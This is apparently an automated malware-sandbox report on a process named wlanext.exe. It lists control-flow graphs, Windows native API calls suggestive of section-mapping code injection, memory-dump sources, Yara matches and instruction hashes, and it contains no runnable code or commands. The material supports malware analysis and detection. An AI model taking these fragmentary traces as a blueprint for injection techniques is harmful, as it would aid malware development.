                                            control_flow_graph 209 34a9baf-34a9bfe call 34a9102 212 34a9c0c-34a9c9a call 34ab942 * 2 NtCreateSection 209->212 213 34a9c00 209->213 219 34a9d5a-34a9d68 212->219 220 34a9ca0-34a9d0a call 34ab942 NtMapViewOfSection 212->220 214 34a9c02-34a9c0a 213->214 214->212 214->214 223 34a9d0c-34a9d4c 220->223 224 34a9d52 220->224 226 34a9d69-34a9d6b 223->226 227 34a9d4e-34a9d4f 223->227 224->219 228 34a9d88-34a9ddc call 34acd62 NtClose 226->228 229 34a9d6d-34a9d72 226->229 227->224 230 34a9d74-34a9d86 call 34a9172 229->230 230->228
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450245257.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_34a0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Section$CloseCreateView
                                            • String ID: @$@
                                            • API String ID: 1133238012-149943524
                                            • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                            • Instruction ID: 31e1db420a5de52d030766b19facbd228732996e16832298c75aa4e11562a0e0
                                            • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                            • Instruction Fuzzy Hash: D8617F70618B4C8FCB58EF6CD8856AABBE0FB98314F50062EE58AC7651DB35D441CB86

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 268 34a9bb2-34a9bef 269 34a9bf7-34a9bfe 268->269 270 34a9bf2 call 34a9102 268->270 271 34a9c0c-34a9c9a call 34ab942 * 2 NtCreateSection 269->271 272 34a9c00 269->272 270->269 278 34a9d5a-34a9d68 271->278 279 34a9ca0-34a9d0a call 34ab942 NtMapViewOfSection 271->279 273 34a9c02-34a9c0a 272->273 273->271 273->273 282 34a9d0c-34a9d4c 279->282 283 34a9d52 279->283 285 34a9d69-34a9d6b 282->285 286 34a9d4e-34a9d4f 282->286 283->278 287 34a9d88-34a9ddc call 34acd62 NtClose 285->287 288 34a9d6d-34a9d72 285->288 286->283 289 34a9d74-34a9d86 call 34a9172 288->289 289->287
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450245257.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_34a0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Section$CreateView
                                            • String ID: @$@
                                            • API String ID: 1585966358-149943524
                                            • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                            • Instruction ID: ac8bd4e15d7024d23a70f1730dfe002e6fbb0706cdfa46561c8f82cee9d190f9
                                            • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                            • Instruction Fuzzy Hash: 75517E70618B088FD758DF1CD8956AABBE0FB98314F50062EE98AC3651DF35D481CB86

                                            Control-flow Graph

                                            APIs
                                            • NtQueryInformationProcess.NTDLL ref: 034AA19F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450245257.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_34a0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID: 0
                                            • API String ID: 1778838933-4108050209
                                            • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                            • Instruction ID: 947609c64611ab86673c02cadeb7b1574e3449755d8f60b7564f738c1b1dd5fc
                                            • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                            • Instruction Fuzzy Hash: 8E514F74918A8C8FDBA5EF68C8946EEB7F4FB98304F40462ED44ADB210DF309645CB45

                                            Control-flow Graph: 547 bca360-bca3b1 call bcaf60 NtCreateFile
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00BC4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00BC4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 00BCA3AD
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction ID: f67a9f3e7b7c95594645118b7aaf02615d0b87216c3a5dd639470f889410e2ba
                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction Fuzzy Hash: 1EF0BDB2200208ABCB08CF88DC85EEB77EDAF8C754F158248BA0D97241C630E8118BA4
                                            APIs
                                            • NtClose.NTDLL(00BC4D50,?,?,00BC4D50,00000000,FFFFFFFF), ref: 00BCA4B5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 6290c39005f8f9aee95d04a16c54b3f8ba4d7717db0a7667504d05d0906aa54f
                                            • Instruction ID: 9c1f1fb40f76f9fb9c84949273eceba4b2fea50791b692e3a1c1ea68d2be7f50
                                            • Opcode Fuzzy Hash: 6290c39005f8f9aee95d04a16c54b3f8ba4d7717db0a7667504d05d0906aa54f
                                            • Instruction Fuzzy Hash: 37F03CB5600108ABDB14DF98DC81EEB77A9EF88718F10855DFD09D7201D630E9108BA0
                                            APIs
                                            • NtReadFile.NTDLL(00BC4D72,5EB65239,FFFFFFFF,00BC4A31,?,?,00BC4D72,?,00BC4A31,FFFFFFFF,5EB65239,00BC4D72,?,00000000), ref: 00BCA455
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction ID: cc4d93888350a2e4d03ffa21d3a8b0eb0068c368c4bd6403379b994409a95af2
                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction Fuzzy Hash: 78F0A4B2200208ABCB14DF89DC81EEB77ADEF8C754F158248BA1D97241D630E8118BA0
                                            APIs
                                            • NtReadFile.NTDLL(00BC4D72,5EB65239,FFFFFFFF,00BC4A31,?,?,00BC4D72,?,00BC4A31,FFFFFFFF,5EB65239,00BC4D72,?,00000000), ref: 00BCA455
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 8d8d7ec8d7892973c3fde1f4d1a7ffc79b2694e24f4bfc62399525d62608610b
                                            • Instruction ID: 23555739bb0942b9a3c7622c40917acad11f6bc7afbe3474975d674eedcb955e
                                            • Opcode Fuzzy Hash: 8d8d7ec8d7892973c3fde1f4d1a7ffc79b2694e24f4bfc62399525d62608610b
                                            • Instruction Fuzzy Hash: DCF0F9B6204148ABCB04DF98DC90CEB77ADEF8D714B15878DFE5D93202C634E8558BA0
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00BB2D11,00002000,00003000,00000004), ref: 00BCA579
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction ID: 0abb1b27005fbba543d2f5f2523a62e42a53629ce2f19e2ca0aeb1575e85b42e
                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction Fuzzy Hash: E6F015B2200208ABCB14DF89CC81EAB77ADEF88754F118148BE0897241C630F810CBA0
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00BB2D11,00002000,00003000,00000004), ref: 00BCA579
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 2bae9cc8795b84b4f01bbf9fc915de301d9b2a4616306d955e925d231791027a
                                            • Instruction ID: 2dec63a0caeceaea1512e553f5d3bf2762e0b7231193f6b9e20243744c40f5bb
                                            • Opcode Fuzzy Hash: 2bae9cc8795b84b4f01bbf9fc915de301d9b2a4616306d955e925d231791027a
                                            • Instruction Fuzzy Hash: BDF030F1100149ABCB15DF58DC84CA7B7ACFF88624B15C65DF95997206C630E815CBB0
                                            APIs
                                            • NtClose.NTDLL(00BC4D50,?,?,00BC4D50,00000000,FFFFFFFF), ref: 00BCA4B5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction ID: 57422b7f2b4154bd6f100dcf3cdc9c1404cd9ebd74c3ec13c363f81f15a90f00
                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction Fuzzy Hash: B5D012752002186BD710EB98CC45F97779CEF44B54F154499BA189B242C530F50086E0
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 64fbfe168c73389aeb2b904787c79d79102db81e88ccd0fe9e44e855b1451c28
                                            • Instruction ID: 1f996a9072cc126d1f4022aa3b60f3f45f9557467cbd6498eead2a22fd72bfb9
                                            • Opcode Fuzzy Hash: 64fbfe168c73389aeb2b904787c79d79102db81e88ccd0fe9e44e855b1451c28
                                            • Instruction Fuzzy Hash: 69900261602404034205B5584414616400A87E0201B55C021E1014690EC6A689D16225
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e41c117d5e355f6c19d8b32cc8b4a9ea9feb1a7e6a7565e146c74232c9944e18
                                            • Instruction ID: 0fac6ea397e610e690b72c70595dfe3d7fab19a71d1f53e0464b89ecaf78ee51
                                            • Opcode Fuzzy Hash: e41c117d5e355f6c19d8b32cc8b4a9ea9feb1a7e6a7565e146c74232c9944e18
                                            • Instruction Fuzzy Hash: D690023160544C42D240B5584404A46001587D0305F55C011A0064794E97A68E95B761
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: cd9d6c8e683b54d175816a4ddf4c8ce95cced546f0af116296f96aad4a5c84ea
                                            • Instruction ID: c71ece9771740dd2e9a3bb8926b7c80c4b0be8f79aaf4988b84f91f888158a9f
                                            • Opcode Fuzzy Hash: cd9d6c8e683b54d175816a4ddf4c8ce95cced546f0af116296f96aad4a5c84ea
                                            • Instruction Fuzzy Hash: 6090023160140C02D280B558440464A000587D1301F95C015A0025754ECB968B9977A1
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ddf2e6aea19755c259f7738094993adddf1e88047ef9e56dca5d10a717d000d8
                                            • Instruction ID: 0bb454e08dfb936cda87ae599f50466870ad673e2f5784717866a9222697e7ad
                                            • Opcode Fuzzy Hash: ddf2e6aea19755c259f7738094993adddf1e88047ef9e56dca5d10a717d000d8
                                            • Instruction Fuzzy Hash: 27900225611404030205F9580704507004687D5351355C021F1015650DD7A289A15221
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e78495a9c0b16810ecd4527405e7c9653f5ff1e3ef7eaf91a26416dd3bda6130
                                            • Instruction ID: a472fa7948674a03eb56686c31c41de6a1e8a80a365b2c0748dd17183ad85e11
                                            • Opcode Fuzzy Hash: e78495a9c0b16810ecd4527405e7c9653f5ff1e3ef7eaf91a26416dd3bda6130
                                            • Instruction Fuzzy Hash: 0F90026174140842D200B5584414B060005C7E1301F55C015E1064654E879ACD926226
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: cc02d915471caa388e601cb28cbf3692964dac64384109c81100471adbef7a78
                                            • Instruction ID: 6ff84dad5c642f397a0561702b5bf4428ac20e52feded2a6eddf3e3c293776b9
                                            • Opcode Fuzzy Hash: cc02d915471caa388e601cb28cbf3692964dac64384109c81100471adbef7a78
                                            • Instruction Fuzzy Hash: E1900221611C0442D300B9684C14B07000587D0303F55C115A0154654DCA9689A15621
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 75621fb3704b6f7f3dd738d58b9644e5c6cb95dd30cadb6be3e62b38e3b6ce40
                                            • Instruction ID: e05fc7d01550ad0dda6147089f0c84f2b7cdc9f8a14a780455b90bd719a7de4b
                                            • Opcode Fuzzy Hash: 75621fb3704b6f7f3dd738d58b9644e5c6cb95dd30cadb6be3e62b38e3b6ce40
                                            • Instruction Fuzzy Hash: 7C90027160140802D240B5584404746000587D0301F55C011A5064654F87DA8ED56765
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f3a9e83550f631fc36b4fc1b454e75eb3eb36482898c664fe6b2f44d0a116287
                                            • Instruction ID: 16d138a50ee23bd0a870a80c1aaeababdc574ca3f7b71bbfa6982d198198e01a
                                            • Opcode Fuzzy Hash: f3a9e83550f631fc36b4fc1b454e75eb3eb36482898c664fe6b2f44d0a116287
                                            • Instruction Fuzzy Hash: DA90022961340402D280B558540860A000587D1202F95D415A0015658DCA9689A95321
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9d34c0a8ab14b144511730219cb55415b7d4bd6c230f1bd9cf9e39ef97414114
                                            • Instruction ID: 023637096a42b954ff95910a81044cd9480dc66ff90cca61fc89a78e3a37e392
                                            • Opcode Fuzzy Hash: 9d34c0a8ab14b144511730219cb55415b7d4bd6c230f1bd9cf9e39ef97414114
                                            • Instruction Fuzzy Hash: BB90023160140813D211B5584504707000987D0241F95C412A0424658E97D78A92A221
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7eb4b257da1fccd3dc0f0f56b8f9559c7c00a82618618115bea0da9cda448ed1
                                            • Instruction ID: 036074b349fc3c3b59fa8f06916827ee44c827f849a379fcd1f8b9b4473a2e79
                                            • Opcode Fuzzy Hash: 7eb4b257da1fccd3dc0f0f56b8f9559c7c00a82618618115bea0da9cda448ed1
                                            • Instruction Fuzzy Hash: EB900221642445525645F5584404507400697E0241795C012A1414A50D86A79996D721
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a76f927472989f0b5fca75ba6742d619a9fd8c755573c25a34df32be4078aab2
                                            • Instruction ID: 07d00e57614759ab77dd481c32f7a086d6f339f5a58ae5b4594cdea09528b958
                                            • Opcode Fuzzy Hash: a76f927472989f0b5fca75ba6742d619a9fd8c755573c25a34df32be4078aab2
                                            • Instruction Fuzzy Hash: 0090023160140C42D200B5584404B46000587E0301F55C016A0124754E8796C9917621
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9c10346d7505e561aacf40d168ac79f257027e7221a913aec46f2202a8b2e39f
                                            • Instruction ID: d569d4c6b042d6e678d6c61268906a1444e4cc0adae5767e8f34424260927e0d
                                            • Opcode Fuzzy Hash: 9c10346d7505e561aacf40d168ac79f257027e7221a913aec46f2202a8b2e39f
                                            • Instruction Fuzzy Hash: D190023160148C02D210B558840474A000587D0301F59C411A4424758E87D689D17221
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7807ccb2a47b1f15b9bd4d788d8398507a93d118322e2e48e04e4f47cb7b6a62
                                            • Instruction ID: 60a24b9c60db845888ca7b6afc3b4a7eeaa645241152a577bda2f529d3cb2ae8
                                            • Opcode Fuzzy Hash: 7807ccb2a47b1f15b9bd4d788d8398507a93d118322e2e48e04e4f47cb7b6a62
                                            • Instruction Fuzzy Hash: A690023160140802D200B9985408646000587E0301F55D011A5024655FC7E689D16231
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: bb5557f1288b8fe8dbe5d477d5c5552e2a5a6e9d2f35b918db5fb178a101520b
                                            • Instruction ID: dc1024ff0530b69ad238b66fed25a16e700b453d359498f6df6185636382494c
                                            • Opcode Fuzzy Hash: bb5557f1288b8fe8dbe5d477d5c5552e2a5a6e9d2f35b918db5fb178a101520b
                                            • Instruction Fuzzy Hash: F3900231A0550802D200B5584514706100587D0201F65C411A0424668E87D68A9166A2

                                            Control-flow Graph
                                            control_flow_graph 403 bc9080-bc90c2 call bcbd40 406 bc919c-bc91a2 403->406 407 bc90c8-bc9118 call bcbe10 call bbacf0 call bc4e50 403->407 414 bc9120-bc9131 Sleep 407->414 415 bc9196-bc919a 414->415 416 bc9133-bc9139 414->416 415->406 415->414 417 bc913b-bc9161 call bc8ca0 416->417 418 bc9163-bc9184 call bc8eb0 416->418 422 bc9189-bc918c 417->422 418->422 422->415
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 00BC9128
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
                                            • Instruction ID: 5a20c1357e03253d779843e330b7a085b23b470e9efb13d94e73adcb6aa99c2d
                                            • Opcode Fuzzy Hash: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
                                            • Instruction Fuzzy Hash: 1A3181B2500645BBD724DF64C88AFA7B7F8EB48B00F14815DF62A6B245D630A650CBA4

                                            Control-flow Graph
                                            control_flow_graph 423 bc9077-bc90c2 call bcbd40 427 bc919c-bc91a2 423->427 428 bc90c8-bc9118 call bcbe10 call bbacf0 call bc4e50 423->428 435 bc9120-bc9131 Sleep 428->435 436 bc9196-bc919a 435->436 437 bc9133-bc9139 435->437 436->427 436->435 438 bc913b-bc9161 call bc8ca0 437->438 439 bc9163-bc9184 call bc8eb0 437->439 443 bc9189-bc918c 438->443 439->443 443->436
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 00BC9128
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 5bc0b5ee1b3b7496bb807e7fa570194f926fa46edc09aaba532142f143b43025
